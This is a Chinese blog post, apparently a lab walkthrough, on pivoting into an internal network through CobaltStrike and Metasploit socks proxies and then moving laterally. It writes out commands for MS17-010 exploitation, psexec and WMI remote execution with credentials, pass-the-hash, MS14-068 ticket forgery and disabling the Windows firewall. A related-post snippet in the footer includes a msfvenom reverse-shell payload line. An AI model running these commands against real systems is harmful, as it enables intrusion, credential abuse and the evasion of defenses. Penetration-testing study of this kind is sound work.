路由代理(msf、CobaltStrike)与内网渗透

置顶 已于 2023-01-20 11:44:10 修改
阅读量2.5k 收藏 7
点赞数 3
文章标签: c语言 bash 开发语言 1024程序员节
于 2021-08-12 21:45:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42478365/article/details/119653906
版权 
kali:192.168.239.0/24
win7:192.168.239.0/24  192.168.52.0/24
win2003:192.168.52.0/24
win2008:192.168.52.0/24

以下用到的工具可以gitthub上下载。

CobaltStrike代理

开启CobaltStrike
在命令行中输入

socks 2222

通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示:
在这里插入图片描述
之后便可以访问内网
也可以用用 proxychains 工具进行内网探测,修改/etc/proxychains4.conf的内容:
在这里插入图片描述
之后可以进行扫描端口与存活主机

主机
proxychains4 nmap -sT 192.168.52.0/24 
端口
proxychains4 nmap -sT -Pn 192.168.52.138

MSF代理

给靶机添加路由,这里使用post/multi/manage/autoroute

# msf操作
route add 192.168.138.0 255.255.255.0 2
route print
    
# session操作(这里使用这种方式添加路由)
run autoroute -s 192.168.138.0/24
run autoroute -p

在这里插入图片描述

使用模块为:

auxiliary/server/socks_proxy

可以不用修改直接run,也可以修改端口号,这里默认端口号为1080
之后在/etc/proxychains4.conf添加
在这里插入图片描述
之后可以进行扫描端口与存活主机

主机
proxychains4 nmap -sT 192.168.52.0/24 
端口
proxychains4 nmap -sT -Pn 192.168.52.138

在这里插入图片描述

内网横向移动

使用ms_017
auxiliary/scanner/smb/smb_ms17_010 #探索哪些主机有漏洞
exploit/windows/smb/ms17_010_psexec#攻击得到shell
exploit/windows/smb/psexec 设置Domain,user,password

MS17010尝试

Ladon 192.168.138.138 MS17010

在这里插入图片描述

域横向移动SMB服务利用-psexec(需要开启445端口,官网自带不会被杀)

psexec第一种:先有IPC链接,psexec需要明文或hash传递

psexec尝试
这款pth神器是不得不用的。内网主机大概率是不出网的,先添加一个smb beacon。
在这里插入图片描述
尝试使用域管账户administrator的账户和密码去撞:
在这里插入图片描述
这里直接就拿下了,域管账户去pth成功的概率是很高的。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

psexec第二种:不用建立IPC直接提供明文账户密码在这里插入图片描述
smbexec无需先ipc链接 明文或hash传递

在这里插入图片描述

域横向移动WMI服务利用-cscript,wmiexec,wmic(135端口)

WMI(Windows Management Instrumentation)是通过135端口进行利用,支持用户明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹(APT或者内网渗透)
C:\Users\Administrator>wmic /node:192.168.52.0 /user:liukaifeng01 /password:12
3.com process call create “cmd.exe /c ipconfig > c:\1.txt”

在这里插入图片描述

案例1:域横向移动PTH传递-利用Mimikatz进行hash传递

在这里插入图片描述第一个是在域中进行hash传递,第二个是工作组在这里插入图片描述

案例2:域横向移动PTK传递-利用Mimikatz进行AES keys传递

在这里插入图片描述

案例3:kekeo&loca

l
第一种利用漏洞
在这里插入图片描述

klist purge 删除所有凭证

在这里插入图片描述

第二种利用工具kekeo

在这里插入图片描述

第三种:利用本地票据(需要管理员权限)

在这里插入图片描述

第四种:域横向移动PTT传递-MS1406

获取域内普通账户sid:(whoami /user 或wmic useraccount get name,sid )
在这里插入图片描述
用已知普通域账户leo的明文密码去制造票据。

  shell ms14-068.exe -u leo@sun.com -s S-1-5-21-3388020223-1982701712-4030140183-1110 -d 192.168.138.138 -p 123.com

在这里插入图片描述

第五种:国产Ladon杀器测试验收

Ladon用法:https://blog.csdn.net/k8gege/article/details/106463082
例如:

Ladon 192.168.138.138 MS17010

在这里插入图片描述

出现的问题:

执行命令还是出现6118错误,这个可能是防火墙造成的,使用命令直接关闭防火墙。

netsh advfirewall set allprofiles state off

本文参考链接:

msf添加路由:

https://www.cnblogs.com/1008612mrzou/p/13183906.html
https://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247486678&idx=1&sn=f54bc2194d260bc7e68518ad87052af8&chksm=ebb6e3d5dcc16ac38afa17602d71a216170d2936519c3398c7211ddbf6d04673ebc48ec2a526&scene=21

内网横向移动

https://blog.csdn.net/qq_23936389/article/details/106485111
https://mp.weixin.qq.com/s/lxiIaSW1oyAkqD0oBm9q4g

CobaltStrike代理:

https://blog.csdn.net/weixin_41489908/article/details/109174048
冯·诺依曼
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
论后渗透MSF之 | 添加路由代理
一醉一休的博客
09-08 6688
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
内网渗透-如何利用msf把流量代理内网-隧道搭建
weixin_42109829的博客
01-10 6818
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
内网安全:代理技术详解
qq_61553520的博客
06-03 8188
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
内网渗透中proxtychains和msf的配合使用
最新发布
weixin_45630387的博客
06-18 269
proxtychain内网渗透使用简单尝试
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 5959
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1862
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
msf添加路由及socks代理内网穿透
2301_76227305的博客
02-21 1675
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
CobaltStrike4.0.zip
03-11
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队行分布式协团操作。
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
Cobalt Strike
06-17
CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 CS功能 Cobalt Strike可以使用 ...
Cobalt Strike4.1
12-30
Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe...
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell.pdf
12-02
Cobalt Strike的核心组件包括teamserver(服务端程序),它在渗透机上运行,以及cobaltstrike.jar(客户端程序),可以在任何支持Java的平台上运行。启动teamserver时,需要指定服务器IP和连接密码,例如`./team...
红蓝对抗之隧道技术第一篇(内网穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网MSF protfwd端口转发/重定向)
Love&Share
12-19 2588
内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透,先来了解下几种转发技术
内网安全】——内网主机发现
Demo不是emo的博客
11-13 8446
内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。那主机发现都有哪些方法呢?
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 1033
cobaltstrike攻击流程,联动msf之socks代理
内网渗透-msf及socks代理转发
baynk的博客
05-29 8995
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
内网渗透——Cobalt Strike4.5 实现代理转发
m0_65544268的博客
07-11 696
3)创建监听器,正向链接的方式,监听端口22224)生成后门文件5)将生成的后门文件在主机2中运行执行命令。
验证内网渗透添加默认路由
orange777
02-23 1761
内网渗透中,如果存在访问不到其它内网主机,而肉鸡又存在双网卡或者多网卡情况,就要考虑在msf中添加静态路由,如下图: 在攻击者A不能直接访问服务器C,但是在拿下内网主机B后,可以通过添加静态路由,借助主机B作为跳板,对服务器C做一步的渗透 可以通过msfvenom制作一个木马,是肉鸡上线,这里我已经做好了 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=8888 -f exe >shell.exe
Cobaltstrike系列教程(九)内置Socks与神器EW
J0o1ey Blog
01-19 7041
0x001-Socks概念 目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值